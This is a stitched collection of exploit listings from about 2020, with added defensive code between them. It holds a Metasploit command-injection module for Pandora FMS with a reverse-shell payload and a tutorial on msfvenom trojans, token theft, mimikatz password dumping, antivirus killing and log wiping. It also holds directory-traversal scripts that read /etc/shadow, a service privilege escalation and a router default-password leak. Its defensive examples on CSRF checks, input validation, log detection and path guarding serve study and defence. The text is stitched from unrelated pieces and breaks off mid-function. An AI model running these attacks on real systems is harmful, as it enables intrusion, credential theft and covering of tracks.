        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
        for key, value in _conn.cookies.items():
            self.cookies[key] = value
        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")

        soup = BeautifulSoup(_conn.text, "lxml")
        csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
        self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")

        login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
        if len(login.history) >= 2:
            if login.history[1].is_redirect:
                self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
            else:
                self.spad_printer("[-] Error")
        else:
            if login.history:
                if login.history[0].is_redirect:
                    self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
                    for key, value in self.session.cookies.items():
                        self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
                else:
                    self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
            else:
                self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")

if __name__ == "__main__":
    try:
        url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        DjangoCsrfMiddleWareBypass(url, username, password)
    except IndexError:
        logo_printer()
        for char in f"[!] python {sys.argv[0]} http://google.com username password":
            sys.stdout.write(char)
            sys.stdout.flush()
            sleep(0.05)
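
The listing above fetches the login page, keeps the csrftoken cookie it receives, reads the csrfmiddlewaretoken out of the form, and posts both back together. To show what Django's CsrfViewMiddleware actually verifies for that pair, here is a re-implementation of the token masking and comparison logic of Django 3.0's django.middleware.csrf as I know it (_salt_cipher_secret / _unsalt_cipher_token / _compare_salted_tokens). It is an added example, neither the listing's code nor Django's own; the function names new_secret, mask_secret, unmask_token, csrf_check and demo are mine.

```python
import hmac
import secrets
import string

# Alphabet and lengths match Django 3.0's csrf middleware.
CSRF_ALLOWED_CHARS = string.ascii_letters + string.digits
CSRF_SECRET_LENGTH = 32
CSRF_TOKEN_LENGTH = 2 * CSRF_SECRET_LENGTH


def new_secret() -> str:
    """Per-session CSRF secret, the value that lives behind the csrftoken cookie."""
    return "".join(secrets.choice(CSRF_ALLOWED_CHARS) for _ in range(CSRF_SECRET_LENGTH))


def mask_secret(secret: str) -> str:
    """Django's _salt_cipher_secret: a fresh random mask followed by the secret shifted
    by that mask, so every rendered form (and the cookie) carries a different string."""
    mask = new_secret()
    chars = CSRF_ALLOWED_CHARS
    cipher = "".join(chars[(chars.index(s) + chars.index(m)) % len(chars)]
                     for s, m in zip(secret, mask))
    return mask + cipher


def unmask_token(token: str) -> str:
    """Django's _unsalt_cipher_token: recover the secret (negative indexes wrap, as in Django)."""
    mask, cipher = token[:CSRF_SECRET_LENGTH], token[CSRF_SECRET_LENGTH:]
    chars = CSRF_ALLOWED_CHARS
    return "".join(chars[chars.index(c) - chars.index(m)] for c, m in zip(cipher, mask))


def csrf_check(cookie_token: str, form_token: str) -> bool:
    """What the middleware does on a POST: both tokens must be well-formed and must
    unmask to the same secret. A token minted for another visitor's cookie fails here."""
    for token in (cookie_token, form_token):
        if len(token) != CSRF_TOKEN_LENGTH or any(c not in CSRF_ALLOWED_CHARS for c in token):
            return False
    return hmac.compare_digest(unmask_token(cookie_token), unmask_token(form_token))


def demo() -> dict:
    """Three submissions: same-session pair, a token from a different session, garbage."""
    session_a, session_b = new_secret(), new_secret()
    cookie_a = mask_secret(session_a)   # csrftoken cookie set on the GET
    form_a = mask_secret(session_a)     # csrfmiddlewaretoken rendered into that page's form
    form_b = mask_secret(session_b)     # a token rendered for a different visitor
    return {
        "same_session": csrf_check(cookie_a, form_a),
        "foreign_token": csrf_check(cookie_a, form_b),
        "garbage": csrf_check(cookie_a, "A" * CSRF_TOKEN_LENGTH),
    }
```

The check passes exactly when cookie and form token unmask to one secret, so a cookie and form token read from the same GET response always verify together; what the mechanism defends against is a cross-origin page that cannot read the cookie. Throttling and lockout on the login view, not the CSRF token, are what limit credential testing against it.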
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Pandora FMS Ping Authenticated Remote Code Execution',
      'Description'     => %q{
        This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
        net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
      },
      'Author'          =>
        [
          'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
        ],
      'DisclosureDate'  => '2020-03-09',
      'License'         => MSF_LICENSE,
      'Platform'        => 'linux',
      'Arch'            => [ARCH_X86, ARCH_X64],
      'Privileged'      => false,
      'Targets'         =>
        [
          ['Automatic Target', {}]
        ],
      'DefaultOptions'  =>
        {
          'Payload' => 'linux/x86/meterpreter/reverse_tcp'
        },
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
        OptString.new('USERNAME', [true, 'The username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri, 'index.php')
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body =~ /Pandora/i
      return CheckCode::Safe
    end

    pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first
    version = Gem::Version.new(pandora_version)

    print_status("Pandora FMS version #{version}") if version

    if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
      return Exploit::CheckCode::Appears
    end

    CheckCode::Detected
  end

  def authenticate
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri, 'index.php'),
      'vars_get'  => {
        'login'   => '1'
      },
      'vars_post' => {
        'nick'          => datastore['USERNAME'],
        'pass'          => datastore['PASSWORD'],
        'login_button'  => 'Login'
      }
    })

    return auth_succeeded?(res)
  end

  def auth_succeeded?(res)
    unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
      print_error('Authentication failed!')
      return false
    end
    print_good('Successfully authenticated')
    print_status('Attempting to retrieve session cookie')
    @cookie = res.get_cookies
    unless @cookie.include?('PHPSESSID')
      print_error('Error retrieving cookie!')
      return false
    end
    print_good("Successfully retrieved session cookie: #{@cookie}")
    true
  end

  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :wget, nospace: true)
  end

  def execute_command(cmd, opts = {})
    print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
    auth = authenticate
    unless auth
      fail_with Failure::NoAccess, 'Please provide a valid username and password.'
    end

    id_agente = 1
    while !session_created? && id_agente <= 10
      send_request_cgi({
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri, 'index.php'),
        'cookie'    => @cookie,
        'vars_get'  => {
          'sec'           => 'estado',
          'sec2'          => 'operation/agentes/ver_agente',
          'tab'           => 'extension',
          'id_agente'     => "#{id_agente}",
          'id_extension'  => 'network_tools'
        },
        'vars_post' => {
          'operation'     => '2',
          'select_ips'    => ";#{cmd}",
          'community'     => 'public',
          'submit'        => 'Execute'
        }
      })

      id_agente += 1
    end
  end
end
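
The module works because the select_ips value it posts reaches an OS command with the attacker's ";" and command still in it. The application-side fix is the same in any language: accept only what the field is for (IP addresses) and never hand user data to a shell. The Python version below is an added example written for this page, not Pandora FMS code (which is PHP); it assumes ping is the underlying command, and validate_targets, rejects, ping_argv, run_ping and unsafe_shell_line are my names.

```python
import ipaddress
import re
import subprocess


def validate_targets(select_ips: str) -> list:
    """Split the posted field on commas/whitespace and keep only syntactically valid
    IPv4/IPv6 addresses; anything else (";id", hostnames, shell syntax) is rejected."""
    targets = []
    for raw in re.split(r"[\s,]+", select_ips.strip()):
        if not raw:
            continue
        try:
            targets.append(str(ipaddress.ip_address(raw)))
        except ValueError:
            raise ValueError(f"rejected target {raw!r}: not an IP address")
    return targets


def rejects(select_ips: str) -> bool:
    """True when validation refuses the value (convenience for checks and tests)."""
    try:
        validate_targets(select_ips)
        return False
    except ValueError:
        return True


def ping_argv(target: str) -> list:
    """argv list for one ping; no shell is involved, so metacharacters are never interpreted."""
    return ["ping", "-c", "1", "-W", "1", target]


def run_ping(target: str) -> bool:
    """Run one ping for an already validated target and report reachability."""
    result = subprocess.run(ping_argv(target), capture_output=True, timeout=10)
    return result.returncode == 0


def unsafe_shell_line(select_ips: str) -> str:
    """What the vulnerable pattern produces: the raw parameter spliced into a shell line.
    Shown for contrast only; this string is never executed here."""
    return "ping -c 1 " + select_ips
```

Validation alone is the first layer; building the command as an argv list (or using escapeshellarg on the PHP side) is the second, so that even a validation slip cannot turn into command execution.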
            

0x01 Meterpreter automatic privilege escalation

1. Generate the backdoor program

Run the following command directly at the Kali command line to obtain a reverse-connect trojan for Windows:

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe

Here the payload of the generated trojan is specified as windows/meterpreter/reverse_tcp, the listener address it connects back to is 172.16.11.2, the listening port is 4444, the output format is exe, and the file is saved to the path /tmp/hack.exe.

2. Run the listener

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 172.16.11.2

show options

Enter the exploit command to activate the module configured for listening.

3. Upload and run the trojan

Upload and run the trojan through the webshell. Here we assume that a webshell on the target machine has already been obtained through a series of penetration tests, and that hack.exe from above has been uploaded successfully through the webshell's file management function. The absolute path of the program is:

C:\www\hack.exe

Next, try to run the trojan through the webshell's command execution function:

C://www/hack.exe   // the path is written with // here to avoid character escaping

After execution we can see that the trojan ran. Switching to the Metasploit command-line window that was listening earlier, we can see that the target machine has connected.

4. Meterpreter basic privilege escalation

Meterpreter is the killer weapon of the Metasploit framework. It is usually used as the post-exploitation payload after a vulnerability overflow: once the vulnerability has been triggered it can return a control channel. Next, use the Meterpreter session to perform automatic privilege escalation. Run the following command directly and MSF will automatically choose a suitable method to elevate the current privileges:

getsystem

The return above means that the Meterpreter session's automatic privilege escalation succeeded. At this point, if the target machine belongs to a domain environment and there is a process running as a domain administrator, we can steal the Domain Admins group token from the specified process PID and do interesting things (such as adding a domain account and adding it to the Domain Admins group). In the Meterpreter session, run the ps command to view the target machine's current processes. Here we assume a process whose running account is a domain administrator is shown; we can find the corresponding process PID in the first column (in fact, we find a process running under the SYSTEM account). The PID is 2584. Run the following statement to steal the token of that user's process:

steal_token 2584

This method is usually used to steal a domain administrator's token. Running

getuid

shows that impersonating the SYSTEM user succeeded. Since we already have SYSTEM privileges, run the following command to try to export the password hashes from the SAM database.

On Windows Server 2008, if the getsystem and hashdump commands throw exceptions, you need to migrate to a process running with SYSTEM privileges; this is introduced later. Run the shell command in the Meterpreter session interface to get a cmd shell. This cmd shell naturally inherits the Meterpreter session's SYSTEM privileges. Run the following cmd commands to try to add the account test to the target machine:

net user test v5est0r /add

net localgroup administrators test /add

Next, use the Meterpreter session to open the target machine's remote desktop service on port 3389 (according to actual testing, this module only supports Windows 2003 hosts):

run getgui -e

Finally, open a new terminal window and run the following command to invoke rdesktop and connect to the target machine's remote desktop:

rdesktop -u test -p v5est0r 172.16.12.2.2   // -u: specify the username, -p: specify the password

0x02 Privilege escalation with overflow vulnerability modules

Generally, the privileges of the web service behind a webshell are very low, typically user privileges, although we have also come across servers that run directly with the highest system privileges, in which case a user is usually just added directly. When privileges are low, they need to be elevated to SYSTEM, the highest privilege on Windows. Hackers usually use exp programs to escalate privileges, which will be introduced in later experiments. Of course, calling MSF's overflow vulnerability modules to escalate privileges is also a good method. Buffer overflow: a buffer is a contiguous region of memory that a program requests from the computer while running, holding data of a specific type. A buffer overflow is a common and very harmful system attack method: by writing content beyond the end of the program's buffer, the buffer overflows, corrupting the program's stack and making the program jump to execute other instructions to achieve the attacker's purpose. More seriously, buffer overflow attacks account for the majority of remote network attacks and can give an anonymous Internet user the opportunity to gain partial or full control of a host. Because this type of attack lets anyone control a host, it represents an extremely serious class of security threat.

1. Call the vulnerability module

Refer to the Meterpreter automatic privilege escalation experiment above to obtain a usable Meterpreter session on the target machine. Then enter the following command in the Meterpreter session:

background   // puts the current Meterpreter session into the background

Then run the following command at the MSF command line to search for Microsoft's available vulnerability modules from 2015:

search ms15   // search for vulnerabilities related to the keyword

As shown in the figure, many vulnerability modules were found. Select the MS15_051 vulnerability for escalation and run the following command:

use exploit/windows/local/ms15_051_client_copy_image

This local module needs to be told which session to run the escalation against. Run the following command to specify session 1:

set session 1   // set the ID number 1 of the session connected to the backdoor now; there is only one session here, so connect to 1 directly

2. Run the overflow

Run the following command directly to call the vulnerable module and elevate privileges:

exploit

According to the returned information, no new session was created, but we are reminded that SYSTEM privileges have been obtained. If SYSTEM privileges are not currently available, it has elevated a process to SYSTEM and provides that process's PID. Generally speaking, even though the privilege escalation succeeded, returning to the connected session with the following command and running getuid still shows the original privileges:

sessions -i 1

Run ps to view the processes. Following the prompt, we find the process with the PID above. Here we picked a process with SYSTEM privileges at random, PID 3240. We then need to use the migrate command to migrate the current session into the specified process ID:

migrate 3240

As seen in the figure, process migration succeeded. Running getuid now shows that SYSTEM privileges are available.

0x03 Subsequent post-escalation operations

1. Basic information collection

Detect whether the target machine is a virtual machine. Run the following command in the Meterpreter session:

run post/windows/gather/checkvm   # whether it is a virtual machine; not accurate here, the module code needs improvement

Kill the antivirus software running on the target host via Meterpreter's killav script. Run the following command in the Meterpreter session:

run killav

This module needs improvement; the process it killed here was cmd. But sometimes it is useful. To get installed software information, run the following command in the Meterpreter session:

run post/windows/gather/enum_applications   # get installed software information

Get the target machine's recent file operations by running the following command in the Meterpreter session:

run post/windows/gather/dumplinks   # recent file operations

2. Read hashes and plaintext passwords

To obtain the user hashes of the target machine's system, run the following command in the Meterpreter session:

run post/windows/gather/smart_hashdump

The module's output against TESTING looks like this:

[*] Running module against TESTING
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /home/croxy/.msf4/loot/20155092922525044_default_10.0.2.15_windows.hashes_407551.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]   Obtaining the boot key...
[*]   Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...
[*]   Obtaining the user list and keys...
[*]   Decrypting user keys...
[*]   Dumping password hints...
[+]   croxy:"whoareyou "
[*]   Dumping password hashes...
[+]   Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]   HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
[+]   test:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::

As shown above, we obtained the hashes of the local accounts; next we obtain the plaintext passwords. The mimikatz module must be loaded first; run the following command in the Meterpreter session:

load mimikatz

You need to confirm that the current process has SYSTEM privileges, then run the following command directly:

msv

As shown in the figure, the following information is returned:

[+] Running as SYSTEM
[*] Retrieving msv credentials

The return information above shows that the current process has SYSTEM privileges. Next, run the following command to export the system users' clear-text passwords:

kerberos

As shown in the figure, the plaintext passwords were exported successfully; the test user's password is v5est0r. Run the following command to export the system user hashes via the mimikatz command line:

meterpreter > mimikatz_command -f samdump::hashes

Run the following command to export the system users' clear-text passwords via the mimikatz command line:

mimikatz_command -f sekurlsa::searchPasswords

3. Clean up traces

Run the following command:

clearev

The return looks like this:

meterpreter > clearev

We can see that this module cleans the history records of three logs: Application, System and Security. MSF also provides the timestomp function module to modify file times, but in actual testing it is of little use; it is only given here as general background:

meterpreter > timestomp C:\\www -c '09/09/1980 12:12:34'   // modify the file creation time

meterpreter > timestomp C:\\jzking121.txt -m '01/01/1991 12:12:34'   // modify the file modification time

meterpreter > timestomp C:\\jzking121.txt -f C:\\rhdsetup.log   // copy the attributes of rhdsetup.log onto jzking121.txt

In actual testing there are occasional errors; you can also log in to the server and change the file times manually.

0x04 AlwaysInstallElevated privilege escalation

1. Generate the MSI install file

After obtaining a Meterpreter session, assuming SYSTEM privileges cannot be obtained with the conventional methods above, AlwaysInstallElevated may bring hope.

AlwaysInstallElevated is a setting Microsoft provides that allows non-privileged users to run install files (MSI) with SYSTEM privileges. Granting this kind of privilege carries certain security risks, because once it is enabled the following two registry values are set to 1:

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]

"AlwaysInstallElevated"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer]

"AlwaysInstallElevated"=dword:00000001

The simplest way to query these two values is with cmd commands. First run shell in the Meterpreter session to switch to a cmd shell, then run the following commands under the cmd shell to query the registry values above:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

The query here reports an error. Note: if the command errors with something like "The system was unable to find the specified registry key or value" or "ERROR: The system was unable to find the specified registry key or value.", it may be because AlwaysInstallElevated is not defined in group policy, so the related registry key does not exist. Assuming AlwaysInstallElevated is enabled, we can use the msfvenom tool to generate an MSI install file that adds an administrator user to the target machine:

msfvenom -p windows/adduser USER=msi PASS=p@ssword123! -f msi -o /tmp/add.msi   // the user to add is specified here: the username is msi and the password is p@ssword123!

As shown in the figure, the MSI file was generated successfully at /tmp/add.msi.

2. Run the MSI file escalation

Next, upload the install file to the target machine as C:\\add.msi by running the following command:

upload /tmp/add.msi C:\\add.msi

After the newly generated MSI file has been uploaded to the target machine, it can be installed with the Windows command-line tool msiexec (first run the shell command to switch to a cmd shell):

shell

msiexec /quiet /qn /i C:\add.msi

The relevant msiexec parameters are explained as follows:

/quiet: quiet mode, no messages to the user during installation

/qn: no GUI

/i: install

After the install program has run, the newly created administrator user can be found on the target machine. Run the following command under the cmd shell to view the list of users in the administrators group:

net localgroup administrators
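
The account-creation and log-wiping steps in the tutorial above leave a characteristic footprint in the Windows Security log: event 4720 (user account created), 4732/4728 (member added to a local/global security-enabled group) and 1102 (audit log cleared; a cleared System log shows up as event 104 in the System log). The detector below is an added example written for this page, not part of the tutorial or of Metasploit; the sample events are constructed in the shape of those records, and detect, PRIVILEGED_GROUPS and CORRELATION_WINDOW are my names.

```python
from datetime import datetime, timedelta

# Constructed sample records in the shape of Windows Security-log events
# (field names follow the event XML: TargetUserName, TargetSid, MemberSid, SubjectUserName).
SAMPLE_EVENTS = [
    {"time": "2020-04-15T10:00:00", "id": 4720, "SubjectUserName": "SYSTEM",
     "TargetUserName": "test", "TargetSid": "S-1-5-21-1111-2222-3333-1003"},
    {"time": "2020-04-15T10:00:02", "id": 4732, "SubjectUserName": "SYSTEM",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1111-2222-3333-1003"},
    {"time": "2020-04-15T10:05:00", "id": 1102, "SubjectUserName": "SYSTEM"},
    {"time": "2020-04-15T11:00:00", "id": 4720, "SubjectUserName": "itadmin",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1111-2222-3333-1004"},
]

PRIVILEGED_GROUPS = {"Administrators", "Domain Admins"}
CORRELATION_WINDOW = timedelta(minutes=10)   # constructed: how soon after creation is "suspicious"


def detect(events) -> list:
    """Return alert strings for (a) an account added to a privileged group shortly after
    it was created and (b) the Security audit log being cleared."""
    alerts = []
    created = {}   # SID -> (account name, creation time)
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        if e["id"] == 4720:                                  # user account created
            created[e["TargetSid"]] = (e["TargetUserName"], when)
        elif e["id"] in (4732, 4728) and e.get("TargetUserName") in PRIVILEGED_GROUPS:
            hit = created.get(e.get("MemberSid"))            # correlate on SID, not on name
            if hit and when - hit[1] <= CORRELATION_WINDOW:
                secs = int((when - hit[1]).total_seconds())
                alerts.append(f"{hit[0]} added to {e['TargetUserName']} {secs}s after creation "
                              f"by {e['SubjectUserName']}")
        elif e["id"] == 1102:                                # Security log cleared
            alerts.append(f"security audit log cleared by {e.get('SubjectUserName')}")
    return alerts
```

Correlating on the SID rather than the user name keeps the rule stable when an account is renamed between the two events; the svc_backup creation by itadmin in the sample produces no alert because no group-membership change follows it inside the window.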

# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH1.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-04-10
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Windows 10, version 1909

In Windscribe v1.83, there is a Windscribe service that every
authenticated user can modify.

C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WindscribeService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

That shows it runs as LocalSystem, which means that the
BINARY_PATH_NAME parameter can be modified to execute any command on
the system.
I'll change BINARY_PATH_NAME to a command that adds a user to the
administrators group, so it will be

C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
administrators pentest /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\mgthura>sc stop WindscribeService

SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x4
WAIT_HINT : 0x0

C:\Users\mgthura>sc start WindscribeService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

Restarting the service will cause it to fail, as the binary path
no longer points at the actual executable of the service.
However, the command will be executed successfully and the user will be
added to the local administrators group.
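
The sc qc output quoted in the listing is the same data a host audit reads to find services that are worth a closer look: a BINARY_PATH_NAME with spaces and no quotes, and a service that starts automatically as LocalSystem. The parser and checks below are an added example, not part of the listing; SC_QC_SAMPLE reproduces the listing's own sc qc output, and parse_sc_qc and audit_service are my names.

```python
import re

# The listing's own "sc qc WindscribeService" output, used here as sample input.
SC_QC_SAMPLE = r"""[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WindscribeService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
"""

SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system"}


def parse_sc_qc(text: str) -> dict:
    """Turn 'KEY : value' lines into a dict; the [SC] status line has no such key and is skipped."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def audit_service(cfg: dict) -> list:
    """Findings for one service configuration; empty when nothing stands out."""
    findings = []
    path = cfg.get("BINARY_PATH_NAME", "")
    # An unquoted path with spaces is parsed by the service controller in pieces,
    # so each prefix up to a space is a candidate executable name.
    if path and not path.startswith('"') and " " in path:
        findings.append(f"unquoted BINARY_PATH_NAME with spaces: {path}")
    account = cfg.get("SERVICE_START_NAME", "")
    if account.lower() in SYSTEM_ACCOUNTS and "AUTO_START" in cfg.get("START_TYPE", ""):
        findings.append(f"runs as {account} at boot; its configuration must be writable "
                        f"by administrators only")
    return findings


def audit_text(text: str) -> list:
    """Convenience wrapper: parse then audit."""
    return audit_service(parse_sc_qc(text))
```

sc qc shows the configuration but not who may change it, which is the actual weakness described in the listing; that comes from the service's security descriptor (sc sdshow <name> prints it as SDDL), where change-configuration rights granted to broad principals such as Authenticated Users are the thing to look for.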
            
# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import os
import time

if len(sys.argv) !=4:
	print "  "
	print "Usage : python exploit.py url filename outputname"
	print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"	
	print "	"
else:


	traversal = "../../../../../../../../../../../../../"
	filename = sys.argv[2]
	url = sys.argv[1]+traversal+filename
	outputname = sys.argv[3]
	content = requests.get(url)

	if content.status_code == 200:
		
		print " "
		print "Directory Traversal Succeeded"
		time.sleep(3)
		print " "
		print "Saving Output"
		os.system("touch " + outputname)
		output_write = open(outputname,"r+")
		output_write.write(content.text)
		output_write.close()

	else:

		print "Host not vulnerable to Directory Traversal!"
            
# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A

#POC:

The default password of this router is the last 8 characters of the
device's serial number, which is found on the back of the device.

An attacker can leak the serial number via the web app API as
follows:

************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm


************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"HG630
V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/


You can use that serial number to login to the router.

#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc
            
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

if len(sys.argv) <2:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
else:
    files=sys.argv[2]
    url=sys.argv[1]    
    with requests.session() as s:
        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        txt=response.text
        print(response.text)
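
Both the TVT NVMS listing and the Zen Load Balancer listing above work the same way: a file name taken from the request is joined onto a base directory and the "../" sequences walk out of it. The server-side check that stops this is to resolve the joined path and require that it still lies under the base, after percent-decoding and before touching the file. The function below is an added example written for this page, not code from either product; safe_resolve, fully_decode, is_allowed and TraversalError are my names, and the ".log" allow-list mirrors the Zen Load Balancer filelog use case.

```python
from pathlib import Path
from urllib.parse import unquote


class TraversalError(PermissionError):
    pass


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so a double-encoded ../ is seen the way the
    filesystem would see it; web servers decode once and applications sometimes decode again."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_resolve(base_dir: str, requested: str, allowed_suffixes=(".log",)) -> Path:
    """Return the absolute path for `requested` inside `base_dir`, or raise TraversalError."""
    base = Path(base_dir).resolve()
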